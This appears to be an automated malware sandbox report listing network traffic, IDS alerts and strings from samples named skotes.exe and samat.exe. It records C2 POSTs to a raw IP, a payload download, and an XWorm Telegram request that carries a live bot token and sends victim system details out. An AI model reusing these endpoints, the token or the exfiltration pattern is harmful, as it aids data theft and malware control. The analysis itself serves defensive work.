Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 23.57.90.111 23.57.90.111
Source: Joe Sandbox View IP Address: 152.195.19.97 152.195.19.97
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50337 -> 20.189.173.5:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50147 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 188.165.52.14:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: global traffic HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: X9nsUlIue40Lh2xDAXDu2pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: - https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: d- https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: thedotmediagroup.com
Source: global traffic DNS traffic detected: DNS query: api.myip.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php58
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpca-11ee-8c18-806e6f6e699
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.dig
Source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 